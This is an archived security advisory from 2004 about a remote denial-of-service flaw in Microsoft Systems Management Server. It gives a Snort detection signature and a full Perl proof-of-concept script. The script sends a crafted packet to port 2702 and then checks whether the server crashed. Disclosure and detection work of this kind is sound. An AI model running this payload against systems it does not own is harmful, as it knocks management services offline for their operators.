TUCoPS :: Windows :: hack0099.htm

TUCoPS :: Windows :: hack0099.htm
MS SMS DOS PoC code and Snort sig

MS SMS DOS Proof-of-concept code and Snort sig ##################################################################### Advisory Name : Microsoft Systems Management Server Remote Denial Of Service Vulnerability Release Date : 22 July, 2004 Application : Microsoft Systems Management Server (SMS) Author : MacDefender / SRR Project Group of Ready Response (srr@readyresponse.org) ##################################################################### Overview In response to a remote denial of service vulnerability in the Microsoft Systems Management Server: http://www.securityfocus.com/bid/10726 http://www.net-security.org/vuln.php?id=3576 We have developed a snort signature to detect attempted DOS attacks to the SMS port 2702 port on a server. In addition we have also released perl code that will demonstrate the vulnerability against a live server, so administrators will be able to test the security of their own Systems Management Server's. ------------------------------------------------ Signature The snort (www.snort.org) signature we have developed for identifying an attempted DOS attack to a Systems Management Server is as follows: alert tcp any 1024: -> any 2702 (msg: "MS SMS DOS"; content: "|52 43 48 30|";depth: 4;isdataat: 139; classtype: denial-of-service;) ------------------------------------------------ Proof of concept code You may test your own Systems Management Server's for vulnerability to this issue by using the following perl code: #!/usr/bin/perl ############################# # # SMS DOS proof of concept and test code # ############################# use Socket; use IO::Socket; if (@ARGV != 1) { print "usage: $0 \n"; exit; } $host = shift(@ARGV); $hexmsg = converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858"); print "\nCreating socket for connection to: $host\n\n"; my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto => "tcp") or die("Could not create socket: $!\n"); $sock1->autoflush(1); print $sock1 "$hexmsg"; while (<$sock1>) { print; } print "\nPacket sent to $host (please wait) ...\n"; sleep(2); print "Verifying status of $host ...\n"; sleep(2); my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto => 'tcp') or die("\nDOS was successful - $host is down ...\n"); print "\nAttempt was not successful. $host is still alive and responding ...\n"; close($sock1); close($sock2); ############################# # End main code, start subs ############################# sub converthex { local ($l) = @_; $l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi; return $l; } ############################# # End code ############################# ------------------------------------------------ Credit Credit for the development of the snort signature and proof of concept code is credited to MacDefender / SRR project group of Ready Response (http://www.readyresponse.org / srr@readyresponse.org)